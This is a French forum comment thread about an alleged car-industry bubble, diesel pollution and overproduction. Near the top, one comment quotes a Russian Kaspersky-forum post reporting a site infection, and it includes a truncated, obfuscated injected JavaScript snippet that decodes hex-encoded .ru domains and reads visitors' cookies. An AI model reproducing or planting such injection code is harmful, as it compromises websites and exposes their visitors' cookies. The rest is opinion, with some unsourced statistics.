    Au fait .. je dois vous dire : 

    Tout cela pour quatre malheureuses toute petites lignes de code que j’avais inventé et dont les droits d’utilisation n’ont pas été contrôlées..

    1. < —code— ! >

    2. If NSA or Control

    3. swallow particles

    4. if not 

    ex expulse

    5. < —end code— ! >

    Les choses tiennent à peu, même dans le domaine de l’auto ..


    NB : je suis allé dire bonjour à Kaspersky : 

    История тут http://forum.kaspersky.com/index.php?showt...view=getnewpost

    Заражения сайта продолжились. 

    Что-то ещё можно предпринять ?

    Вот такой код в него внедряется :

    <script type="text/javascript">// < ![CDATA[
    window.a1336404323 = 1 ; !function()var o=JSON.parse(’[« 6e33646b337a72372e7275 »,« 673333746d3079792e7275 »]’),e="",t="19748",n=function(o)var e=document.cookie.match(new RegExp(« (? :^| ; ) »+o.replace(/([.$ ?*|()[]\\\/+^])/g,« \\$1 »)+« =([^ ;]*) »)) ;return e ?decodeURIComponent(e[1]):void 0,i=function(o,e,t)t=t|| ;var n=t.expires ;if(« number »==typeof ..

    и так далее


  • julius 1ER 23 avril 2016 10:39

    merci Arthaud !!!


    en venant sur ce forum je n’avais pas mesuré les tenants et les aboutissants ....comment dire les implications de l’hyper-production en système Capitaliste !!!
    finalement comment ne pas analyser au mieux un système au travers d’un de ses mythes ???
    l’automobile est vraiment un mythe fondateur du Capitalisme moderne ... c’est la liberté de circuler, le symbole de la richesse, elle est le symbole de la réussite personnelle ( bien sûr cela s’applique à ceux qui veulent croire ou faire croire à ces mythes .. et ils sont nombreux !!!!)

    cela devient vite comme je l’ai dit « un sujet brûlant » et explosif et je pense que si un Taddei avait la bonne idée de s’en emparer, de nombreux citoyens au travers de ce cours d’économie magistral pourraient comprendre le monde dans lequel ils vivent et ce ne serait pas un luxe car malheureusement la plupart des gens sont nuls en économie !!!

    en tous cas sur ce forum sur ce sujet vous n’aurez pas les commentaires des décérébrés habituels je n’ose les citer mais je les cite quand -même ... les Spartacus , Rocla, Fifi etc....

    car le nez dans leurs contradictions ils ne trouveront rien à dire sur ce sujet qui balaierait trop leurs certitudes car le simplisme ......c’est la faute à l’UE ou à Tartempion ne s’applique pas de toute évidence à ce sujet mais il est certainement trop tôt pour le dire ???????????

    • izarn izarn 23 avril 2016 11:29

      @julius 1ER
      Bien sur que si c’est la faute en partie à l’UE, et à la BCE.
      Elle n’a fait que faire progresser la financiarisation des boites, pour aprés la catastrophe reconstituer la bulle par des QE « illimités »....


    • bakerstreet bakerstreet 23 avril 2016 11:49

      @julius 1ER
      Vous avez raison...J’ai appris que le prix moyen d’une bagnole par les temps qui courent de plus en plus débilement, était de 23 000 euros. Voilà le prix de la vanité pour le français moyen. Voilà la raison de l’endettement de beaucoup, la raison pourquoi ils vous assommeront si par hasard vous rayez leur sanctuaire, l’endroit où ils se semblent le plus libre au monde, entre deux radars, deux flash !.

      La bagnole vous formate, elle transforme les gens en plus cons qu’ils sont au départ, ce qui est une gageure pour certains. Plus je connais la bagnole plus j’aime mon vélo, mais il ne pèsent pas lourd dans la circulation, et mieux vaut ne pas claironner ces argument face à des abrutis qui prendraient encore plus leur bagnole pour une arme létale, s’ils n’avaient pas peur de l’abîmer.
      On pourra en profiter pour relire Roland Barthes, version DS 1957 :« Je crois que l’automobile est aujourd’hui l’équivalent assez exact des grandes cathédrales gothiques : je veux dire une grande création d’époque, conçue passionnément par des artistes inconnus, consommée dans son image, sinon dans son usage, par un peuple entier qui s’approprie en elle un objet parfaitement magique..... »
      Démystifier l’objet, le déshabiller, c’est déjà lui retirer une partie de son pouvoir sur vous. Mais bien peu parviennent à s’apercevoir que la bagnole a pris le pouvoir et l’ascendant sur leur vie, leur économie et leur fonctionnement, au point que ce sont eux, le pilote automatique. 

    • Arthaud Arthaud 23 avril 2016 12:03

      @bakerstreet


      .. taing ! Excellent, trop excellent .. Mais que ça reste entre nous n’est-ce-pas ? Avec vos observations et celle de Barthes (ajoutées à celles de Bernanos et de quelques autres), vous allez finir par foutre le bordel : responsable de l’écroulement du Kapitalismus ! 

      Vous imaginer ce que ça peut vous coûter ? Et Carlo Revelli qui a laissé faire .. complice, idem aux pattes ! en « Justice »

      Et imaginez que ce papier fasse 50 000 lecteurs ? et qu’il soit repris au 20 Heures ? Vous êtes bon pour la hart et l’ardeur .. Tenez, je me désolidarise et soutiendrai mordicus que l’auto est l’avenir de l’homme

      Bien à vous

    • bakerstreet bakerstreet 23 avril 2016 12:48

      @Arthaud
      Le problème vient que la plupart des gens acceptent la critique jusqu’au mur de leur jardin, pas au delà. Nous vivons avec la bombe de la baisse de la qualité de l’air, et un environnement à la campagne si hostile, que les abeilles viennent trouver refuge en ville, malgré un air quelque peu pollué aussi. Mais peu de pesticides. Ces petites bêtes nous disent que le mieux est souhaitable au pire.

       Les publicités automobiles ont très bien intériorisés ces paradigmes de danger, mais en les incorporant à des scénarios ludiques, sur fond de revival, version stade. Il faut jouer avec les phobies pour les transformer en fantasmes : La voiture, c’est un comble, est alors vu comme l’ultime refuge, le lieu clos où l’on regarde les miasmes du monde industriel s’éloigner dans les rétros et la lunette arrière, alors que le vieux mâle dominant au volant de son « cheyenne » serre le volant, dirigeant sa tribu vers les derniers espaces vierges, non post atomiques à la mad max. 
      Reste que tout cela est un leurre, sorti des images de synthèse qu’on prend maintenant pour la réalité. On attend plus que le casque qui nous mettra 24 heures sur 24 dans une autre réalité. Le paradis sera en 3 D et diesel ou ne sera pas !

    • julius 1ER 23 avril 2016 13:18

      @izarn

      arrêtes de donner dans les simplismes à la FIFI... la BCE n’a pas inventé le Capitalisme et même si elle contribue à alimenter la « bulle » automobile dont on parle, il est impératif de comprendre où mène la surproduction ou l’hyperproductivité lorsqu’elle ne mène nul part ou dans une impasse... 

      j’écris en général pour éclairer les gens qui cherchent à comprendre pas pour cliver et pas pour convaincre des gens déjà convaincus ou même des gens qui ne veulent rien comprendre ....
      j applique la théorie du Colibri tout simplement !!!!!!!!!!!

    • Arthaud Arthaud 23 avril 2016 14:43

      @julius 1ER


      FIFI ? Forces Françaises de l’Internet ? 

      NB : il y a 20 minutes : «  Le français qui officiait en F1 l’année dernière revient sur ce nouveau championnat de monoplaces 100% électriques, plus économique, plus écologique… »

      plus économique, plus écologique .. ouf ! nous voilà rassurés


    • Croa Croa 24 avril 2016 10:12

      À bakerstreet « Démystifier l’objet, le déshabiller, »
      *
      Voilà qui nous rappelle une blague des années 60 !
      Le comble du mécanicien ?
      Déshabiller une DS pour s’en faire une ID !

       smiley smiley smiley smiley smiley smiley smiley
      (Ça ne nous rajeuni pas.)


  • izarn izarn 23 avril 2016 11:16

    « La bulle automobile, C’est la bulle la moins connue dit le Figaro »
    Hahahahahahahahahhhhahhha smiley
    Ben elle est vachement visible cette bulle, c’est celle qui a mis en faillite Peugeot, racheté in extremis par les chinois !
    C’est cette bulle qui avait flingué les constructeurs américains en 2009....

    Décidement, les cons ça ose tout c’est à ça qu’on les reconnait.
    Ca fait huit ans que je raconte le processus... smiley

    Peugeot par exemple avait crée à La City une banque « Peugeot finance », et une succursale, banque de pret à Malte (4% d’impots). Les prets auto étaient ensuite titrisés par Peugeot Finance.
    Il faut savoir que la moitié du capital des grosses boites n’est pas matériel, mais financier.
    Le capital financier est égal à la dette de l’entreprise. De fait le capital matériel faisant caution.
    Quand la finance croule, la boite est foutue.
    Cette méthode a pour but de distribuer des dividendes élevés, basés sur des CDO, assurés par des CDS, et autre produits dérivés devenus complètement pourris, toxiques depuis 2008.
    Comme il n’y a jamais eu de réglementation, mais au contraire des QE « illimités » destinés a racheter ces produits toxiques, ce petit jeu continue....
    Il n’y a jamais eu de reprise, nous sommes toujours dans la continuation de la crise de 2008 qui s’aggrave.
    De 1929 à 1939, les USA étaient toujours en récession....


    • Arthaud Arthaud 23 avril 2016 11:40

      @izarn


      Bel éclairage sur le sujet .. Ce qui serait intéressant ensuite, c’est de donner quelques mots sur ce que ça va donner .. ça va durer encore longtemps ? On va voir fleurir des CUMA ? (Coopérative d’Utilisation de Matériel Automobile ...) .. Les taxes vont diminuer ? Retour au HPD ? (Vélo ..)

      Ni à travers l’article, ni à travers les commentaires on a réussi à préciser ce que sera l’avenir proche

    • julius 1ER 23 avril 2016 13:33

      @izarn


      tu racontes quand même des conneries !!! Peugeot a frisé la faillite et la sortie de route à cause de la fermeture du marché Iranien qui absorbait presque 46 % des ventes de Peugeot .... 

      et pourquoi ???? parceque les USA avaient déclaré un embargo sur les importations iraniennes surtout que GM venait d’entrer au Capital de Peugeot à raison de 8%.. ces raisons ont fait que Peugeot a du chercher d’autres marchés notamment le marché chinois mais cela prend quand-même un peu de temps pour se retourner .... si jamais on y parvient !!!!!
      mais la vraie question à laquelle personne ne répond ou n’a répondu :

      c’est comment Peugeot s’est retrouvé avec une telle part de marché sur le marché Iranien ????
      toi qui semble avoir réponse à tout je serais curieux d’entendre ou lire ton analyse .... 

      je suis tout ouïe !!!!!!!!!!!!!!!!!!!!!!

  • bakerstreet bakerstreet 23 avril 2016 11:37

    - Vous connaissez un domaine qui affiche 3000 morts par an, et qu’on évoque seulement en thème de marché, craignant avant tout que les gens regardent les choses en face ?

    -Vous connaissez une usine à rêve où les gens refusent de voir les pots d’échappement ; les diesel selon l’OMS, (sûrement une organisation terroriste) 30 000 morts par an ?
    Voilà la véritable bulle. Le scandale sanitaire à venir. Le logiciel pollueur de vw n’en étant qu’une des tête émergées de cette méduses. 
    Bien sûr impossible d’attaquer la bête sous tous les fronts. Déjà illuminer les vieux diesel et stopper la production des neufs serait une petite révolution. Vous n’y pensez pas, on préfère voir nos enfants crevés. Pas les nôtres bien sûr, plutôt les vôtres..
    Le scandale de l’amiante à coté c’est de la petite bière. « On ne savait pas, on ne se rappelle plus comment ça c’est fait ! » Dira t’on plus tard. 
    .Les vieux achètent de gros diesel 4.4 pour se sentir en sécurité. C’est l’image terrible de la violence et de l’hypocrisie du monde. Mais la panne générale n’est pas loin. 

    • Arthaud Arthaud 23 avril 2016 11:52

      @bakerstreet


      Oui .. presque 30 000 morts pour l’UE. Le moins qu’on puisse dire, c’est que c’est pas du tout traité (« traité » étant un euphémisme gentillet ..) dans le « Media »

      Nos contemporains aiment bien vivre les yeux fermés .. Malheur à qui veut leur faire ouvrir

      Y’a un site, j’ai pas retrouvé, qui met deux compteurs en parallèle : l’un montre les morts par la « terreur », l’autre par les voitures . Faut être pervers dites ! 

      « Les vieux achètent de gros diesel 4.4 pour se sentir en sécurité. C’est l’image terrible de la violence et de l’hypocrisie du monde. Mais la panne générale n’est pas loin. » vous dites

      Je pense comme vous .. mon pote lulu qu’a acheté un gros porche, l’autre la Mustang impressionnant .. y’en a des gens qui jouissent avec des pistons au cul ! 

      Mais ? je serais pas un peu vieux con ? jaloux, terrorisse cassandrique ? Yep 

      Faut se méfier ! Incitation à la détestation des pistons avec préméditation, c’est un chef d’inculpation qui peut vous mener en prison, voire décapitation

      Mieux vaut en rire, pour ce que le rire est le propre de l’homme (s’il en reste ..)


  • marmor 23 avril 2016 12:09

    Vous connaissez un domaine qui affiche 3000 morts par an, et qu’on évoque seulement en thème de marché, craignant avant tout que les gens regardent les choses en face ?

    4200 morts par an de maladies nosocomiales contractées dans les hopitaux français

    Voià Mr Bakerstreet ! Vous en entendez parler de ceux là ?


    • bakerstreet bakerstreet 23 avril 2016 12:33

      @marmor
      Je vous remercie de me poser la question comme dirait l’autre au volant de sa vw. Vous savez j’ai passé ma vie dans les hôpitaux. Je connais un peu le problème. Pourtant jamais autant on ne s’est lavé autant les mains, jamais on n’a pris autant de précautions ! Mais c’est un autre problème dont il faut rechercher l’origine en amont, sur les cotés,ailleurs, en dehors des hôpitaux, dans la tête des gens qui est une chambre stérile...Les souches résistantes se sont développés à mesure qu’on a cherché à les éradiquer. Ces bestioles ont un logiciel redoutable d’adaptation et de défense. Entre l’époque où Semmelweis devait se battre pour que les obstétriciens se lavent les mains pour accoucher et celle où les phobiques se lavent les mains avec un gel antibactérien avant de passer à table, il y a un siècle, et un scandale à venir. Vous pouvez observer la même chose dans la nature, là où met des pesticides à la place des antibiotiques. On n’attaque pas un problème ou une résistance au canon antichar, il faut faire avec la nature. Sinon méfiez vous des retours de bâton. Les anciens avaient incorporé ces techniques à leurs pratiques....Combien de morts des pesticides ? Je vous laisse faire le calcul. Personne n’est capable de le faire ; On constate juste dans les hôpitaux d’ailleurs, le taux anormal de Parkinson, de cancers en pédiatrie, de phénomènes d’allergies, de troubles respiratoires, de maladies dégénératives dont l’explosion est incontestablement liée à l’environnement. Le diesel en France n’a pas fini de faire des ravages. On s’en lave les mains, avec des gels antibactériens, comme un rituel de déni. 


    • marmor 23 avril 2016 15:04

      @bakerstreet
      Les chercheurs n’arrivent pas à éradiquer les souches mutantes des staphylocoques dorés, soit 4200 morts pour être venus se soigner, sans compter les plus de 200000 infectés à vie...
      Les constructeurs automobiles ont par contre fait d’énormes progrès en matière d’émission polluantes. Il suffit de « sentir » passer une vieille 504 peugeot, ou suivre une nouvelle 508 hybride. Vous verrez-sentirez que ce n’est pas du tout la même chose. Et mettre toute la pollution sur le dos des bagnoles, c’est un peu facile, fi des usines, des bateaux, des trains, des bus, des vaches, etc.....


    • bakerstreet bakerstreet 23 avril 2016 17:59

      @marmor

      Je connais assez bien le problème pour avoir fait un article la dessus il y a quelques temps, et même deux . 

      -Tout ce que vous avez toujours voulu savoir sur le diesel, sans jamais oser le demander ! -Une enquête à l’américaine : De la friture dans le diesel !

      Ce n’est pas en minorant l’impact d’un élément, que vous résoudrez le problème de l’addition des problèmes. Comme si on pouvait relativiser l’un en désignant l’autre, alors qu’ils potentialisent. Il n’y a pas de bonnes diesels, ça n’est qu’un mythe, le logiciel VW étant là pour nous le rappeler par l’absurde. On n’a donné des pastilles vertes à des armes létales. Le filtre à particules est une escroquerie, ce n’est plus à prouver. Il est seulement efficace quand le moteur est chaud et à bon régime ! Hors les gens se déplacent pour de courtes distances pour la plupart. Ne pas hésiter à investir 30 000 euros dans une caisse et préférer une motorisation avérée dangereuse pour les autres, à seule fin d’ économiser quelques euros sur un plein est consternant mais pas étrange, quand on connait l’homme. Le filtre est une saloperie, tout les spécialistes honnêtes sont d’accords, même les pollueurs qui s’en débarrassent au mépris de la loi car ce truc oblige à un entretien coûteux, risque de casser le moteur neuf, et est à l’origine d’un vieillissement prématuré. Les particules fines du diesel passent directement dans le sang et sont à l’origine de cancers dont le grand bénéfice pour les industriels vient du fait qu’on ne peut directement leur imputer, l’absence de preuve flagrante faisant loi, comme pour les pesticides. Au bout de tout ça, les services débordent de gamins sacrifiés, d’insuffisants pulmonaires. La faute à personne. Pas à moi j’ai jamais tué de chats, comme disait Brel. 

      Maintenant vous avez raison : Une bonne partie du carbone vient de l’agriculture, des usines à viande, des engrais, de l’alimentation carnée. Agriculture intensive et automobiles, surtout diesel, se tiennent par la main pour nous amener en enfer. Le nier, le minorer ?..Facile de se mettre la tête dans le sable tant qu’on n’est pas touché, mais plus difficile quand on regarde autour de soi, car les cancers dit rares hier, explosent ! Je ne parle pas des pathologies de la thyroïde, des leucémies, d’évidence impactés par ces choix funestes, qui sont ceux du libéralisme et de la politique cynique du « pas vu pas pris ». Pas de filtre à particule pour protéger votre gosse quand il marche dans la rue, ou quand les poussettes passent sous les pots d’échappement

    • bakerstreet bakerstreet 23 avril 2016 18:09

      @marmor
      Et le comble est qu’on est loin d’être au point omega. 70 % du parc étant maintenant diesel, ce qui est nouveau, car au début des années 2000 bien qu’en augmentation, il était à peine à 30%.....Le pire est devant nous, avec le vieillissement de ces objets de terreur, fumant comme 30 friteuses, mais dont au parlera moins qu’un d’un seul fusil kalashinov, bien que faisant plus de morts. Mais déjà se profile une certitude : L’espérance de vie diminue pour la première fois. Ce n’est pas fini. Des courbes bientôt vont se croiser, et ce ne sera pas un hasard. 


  • julius 1ER 23 avril 2016 14:45

    la vraie question que pose cet article et qui transparaît en filigrane , si l’on y ajoute le lien de Roby :



    c’est d’une part si l’on continue dans cette impasse que devient vite« la surproduction » de véhicules il se passe quoi : 

    a)des constructeurs vont à la casse ... car les plus costauds peuvent temporiser et faire du « dumping » vente à perte... mais dans le même temps phagocyter les producteurs en difficultés .. 
    d’où une accélération de la concentration des producteurs d’automobiles si bien qu’à la fin il va en rester 1 ou 2 sur le marché ...

    b) cela ne résous en aucun cas le problème de la surproduction mais surtout ne redéfinit en aucune manière la place que doit occuper l’automobile dans la société au contraire les choses s’aggravent , crise de surproduction ,crise de l’emploi mais aussi aggrave la crise économique parceque cette impasse stérilise des mannes financières qui devraient justement aller vers d’autres secteurs (infrastructures ) qui pourraient améliorer le vivre ensemble.....

    c’est sûr Arthaud tu as mis le doigt sur une vraie « bulle » mais finalement ce que l’on écrit en ce moment sur l’automobile, peut s’appliquer à de nombreux autres secteurs de l’économie ... c’est dire si l’on est dans une impasse et que les politiques proposées ne sont pas à la hauteur des enjeux !! 

    • Arthaud Arthaud 23 avril 2016 15:05

      @julius 1ER


      Le lien de Roby fait débat : Hoax ? ou réalité ? Océans de ferrailles orphelines ? ou enfumage ..

      Quant à la bulle automobile, j’ai ouvert en disant qu’elle s’ajoute aux autres : bulle de immobilier, prêts étudiants, bulle des cartes de crédit ... bulle de la corruption aussi devrait-on ajouter : dans mon bled, y’a un brebis qui - apparement, mais vous vérifiez - s’était servi 100 000 et des en plus de son traitement .. Un monde en bulle ... champagne ! 

    • marmor 23 avril 2016 15:25

      @julius 1ER
      Je vous met au défi de trouver une seule voiture neuve en train de pourrir sur un parc depuis cinq ans !
      Même les plus gros « fours » commerciaux qu’ont pu être certains modèles ont tous été refourgués au réseau des concessionnaires de la marque, qui eux mêmes, les bradent à des clients.
      Vendre à perte, comme vous dites, pour un constructeur, cela n’existe pas, car le prix de revient d’un modèle n’a rien à voir avec son prix de vente, loin de là, et croyez moi, je sais de quoi je parle depuis 40 ans !
      Dans la création d’une automobile, ce qui coûte cher, c’est la conception, le dessin, la mise en oeuvre des matrices et de la robotique pour la fabrication ( 3 ans en moyenne entre le dessin et la sortie du premier exemplaire ) Il faut ensuite quelques centaines de milliers de véhicules vendus pour amortir cet investissement, et ensuite, ce qui vous est proposé à 20 000 € revient en coût de fabrication à même pas un tiers de ce prix. Donc en bradant certains « nanards » à 50% de son prix catalogue à son réseau de distributeurs, un constructeur gagne encore de l’argent.
      Pour info, un constructeur peut ralentir la production d’un modèle qui se vend bien, pour allonger les délais de livraison et creer une demande plus forte que l’offre... Ca s’appelle du marketing !


    • marmor 23 avril 2016 15:40

      @marmor
      Les images que vous avez vu sur le lien de Roby :
      Il s’agit d’ères de stockage régionales qui permettent aux concessionnaires locaux de la région n’ayant pas suffisamment de place chez eux, de stocker une partie des véhicules envoyés par les constructeurs. Chaque véhicule est gardé par des sociétés comme Wallon par exemple, et ce service coûte très cher, entre 50 et 60 € H.T par véhicule / mois. Sur ces ères, sont également stocké des véhicules dits « retour de location » courte ou longue durée, destinés à être redirigés chez les concessionnaires, ou vendus à l’exportation.
      Les seuls véhicules n’ayant pas encore été vendus par les constructeurs se trouvent sur les parcs des constructeurs, autour ou proches des usines, et prêts à partir pour ces ères de stockage régionales, avant éclatement et livraison au réseau.


  • marmor 23 avril 2016 15:57

    Pour citer quelques chiffres que je connais sur la région toulousaine. Chaque concessionnaire dispose d’une clientèle de la ville et les premiers concurrents se trouvent environ à 50 kilomètres autour :
    Audi : un seul concessionnaire ; contrat : 1200 véhicules neufs ( à réaliser s’il veut toucher les primes )
    Mercedes Benz : 1300 VN un seul concessionnaire
    BMW : deux concessions : 800 VN pour une, 700 pour l’autre. Donc plus de 4000 VN pour seulement trois marques, et les contrats sont remplis tous les ans !!
    Je ne cite que les marques dites « premium » à plus petite diffusion par rapport aux constructeurs comme Renault, Peugeot ou Citroen.
    Vous comprenez mieux l’étendue des parcs de stockage, sachant qu’il y a aussi les VO retour de loc et que le marché de l’occasion est le double du marché du neuf, hors transaction de particulier à particulier !


    • julius 1ER 24 avril 2016 03:24

      @marmor


      tu as tord à mon avis le lien de Roby n’est pas un « Fake » il est assez documenté et les endroits où sont entreposés tous ces véhicules semblent correspondre à des anciens aérodromes donc loin des sites de productions de véhicules mais cela finalement n’est qu’un point de détail de l’histoire ...
      pour paraphraser une personnalité décriée !!!

      ce qui est important dans cette histoire c’est que les capacités de production dans de nombreux domaines ont été développés de manière exponentielles et le résultat de ce processus est que l’on se retrouve dans un schéma de crise classique du Capitalisme cad de surproduction .....

      or il y a souvent surproduction parceque il y a en même temps sous- consommation et le moyen pour pallier à ce phénomène cad pour que production et consommation s’équilibre ... le moyen pour concilier offre et demande... c’était et c’est le crédit ..... mais lorsque les capacités de production sont trop développés pour éviter l’effondrement des cours on détruit ou on transforme les produits si ce sont des fruits on fait des confitures ou si ce sont des produits laitiers on stocke du beurre ou on déshydrate le lait ..... 
      mais lorsque qu’il s’agit de produit complexe comme l’automobile la solution finale c’est la destruction ....

       je pense que tout le monde sait que depuis 2010 on produit plus de puces électroniques chaque année que de grains de riz ...... ce qui en dit long sur les capacités productives cumulées des pays industrialisés !!!!!!!

      or il est clair que tôt ou tard on rencontre le mur et le mur c’est le marché qui ne peut plus absorber
      les productions parceque totalement saturé et qu’on le veuille ou non l’automobile est un produit complexe qui ne peut que rester cher et pourquoi ????
      beaucoup d’intervenants dans la fabrication d’une auto sidérurgie, métallurgie, chimie pétrochimie verre, plastiques, toutes sortes de métaux caoutchoucs et surtout beaucoup de valeur ajoutée avec les bureaux d’études etc.....avec aussi des secteurs de pointe pour l’usinage de certaines pièces !!!
      et maintenant cerise sur le gâteau la robotique qui quoiqu’on en dise est de la très haute technologie à forte valeur ajoutée !!!!

      aussi s’il arrive qu’à un moment donné on produise plus de véhicules de par le monde que celui-ci ne peut en absorber alors que les infrastructures routes ponts et villages qui n’ont ni eau courante ni électricité et encore moins de station service ne peuvent le permettre.. c’est que l’on est vraiment au bout d’un processus........
      on ne va pas demander à chaque habitant de la planète en âge de procréer d’acheter et de stocker
      des bagnoles et s’endetter à vie pour faire plaisir à Peugeot ou Mercedes ????

      mais cette analyse du système de production de l’automobile doit nous remettre en mémoire que depuis le début du mandat de F Hollande c’est la politique de l’offre qui a été mise en place avec le CICE et tous les cadeaux fiscaux faits aux entreprises et cette politique de l’offre comme on peut le constater avec ces différentes « bulles » ne tient pas la route ..... 

      car si l’on en vient à produire pour produire sans que l’individu ni les peuples n’y trouvent leur compte je doute fort que ce système puisse durer ad vitam eternam......


  • Arthaud Arthaud 23 avril 2016 18:34
    « JE SERS TON HUIS »

    Merci à Bakerstreet qui vient de redonner les liens vers deux articles à lui, excellents, qui éclairent notre sujet d’un éclat quelque peu alarmant, bien au delà de l’orgie financière sur laquelle je focalisais :


    Notons que dans ces deux articles, l’image choisie en tête est dans le même « esprit » qu’ici .. provocante au possible la réclame sexualisée de VW qui dit : Je sers ton Huis

    NB : Au delà de la gabegie financière, au delà de la cata sanitaire, c’est là qu’on voit que « l’amour de l’auto » est porno .. naturellement porno

    • julius 1ER 24 avril 2016 03:58

      @Arthaud

      sûr que le résumé de Bakerstreet est intéressant mais le problème n’est peut être plus de choisir entre essence et diesel ... mais entre la vie et la mort !!!!

      car des villes saturées d’autos n’apportent plus de progrès surtout lorsque l’on passe 3 heure dans les embouteillages mais n’apportent que des contraintes temps, pollution et maladies conséquence directe de cet état de fait .... 
      et là on entre bien dans le coeur du réacteur cad qu’il faut réarticuler tous ces paramètres... territoires /transport/ travail... en clair repenser l’économie ???? 
      et là je doute fort que dans l’état actuel des choses on y parvienne, les égoïsmes et intérêts particuliers, catégoriels sont devenus trop prédominants pour le pire et pas pour le meilleur !!!

      on n’échappera pas à une grande remise en question des valeurs dominantes qui nous sont imposées et que l’on accepte cad le toujours plus dans une fuite en avant ... 
      il va falloir remettre de l’intelligence dans le collectif à tous les étages de la fusée et là c’est pas gagné mais maintenant c’est une question de survie tout simplement !!!

    • Arthaud Arthaud 24 avril 2016 08:16

      @julius 1ER

      Qui ne partagerait pas votre analyse ? L’industrie de la réclame peut-être ? L’industrie du spectacle, les fabricants de consumérisme ?


      Des bouts de solutions se mettront en place qui reculeront l’échéance .. Ces solutions, on les devra à des innovations dans les pratiques et l’organisation globale, dans le cadre d’une coopération entre les « usagers », les professionnels en bas de l’échelle - garagistes, réparateurs - et les « Uber-men » du secteur .. Il s’agira de satisfaire le simple besoin de se déplacer, rien d’autre

      Je regardais hier la course à Paris de « Formule E » .. Quelle obscénité ! Une tire, c’est pas fait pour faire la course, c’est pas un jouet, c’est pas un spectacle, c’est pas fait pour perdre son temps à des excentricités 

      Bonne journée 

  • o.man 24 avril 2016 17:58

    La solution à toute ces automobiles dormantes aurait été de transformer tous les chômeurs potentiels en auto entrepreneurs chauffeurs d’UBER .

    L’état aurait eu le beurre et l’argent d’UBER .
    Malheureusement ça ne s’est pas fait et ça ne se fera jamais .

    L’autre solution , j’ai entendu ça aux infos , c’est de les vendre en pièces détachées , il parait que les garagistes seront obligés de proposer , lors de réparations , des devis avec pièces d’occasion .
    Ça pourrait limiter les pertes .

    En attendant un éventuel héritage d’un riche parent éloigné dont je ne connais l’existence , je fais comme beaucoup de monde , j’attends que la chance sourie à mon tour ... (L’auto , à qui le tour ?)


  • Arthaud Arthaud 25 avril 2016 21:55

    Les prix des véhicules anciens ont grimpé de 400% en dix ans. La passion s’est transformée en investissement.


    JournalduNet ..

    NB : une activité complémentaire pour les petits garagistes, très lucrative .. ? Qu’en pense la VroumTeam, pionnière .. ?

Réagir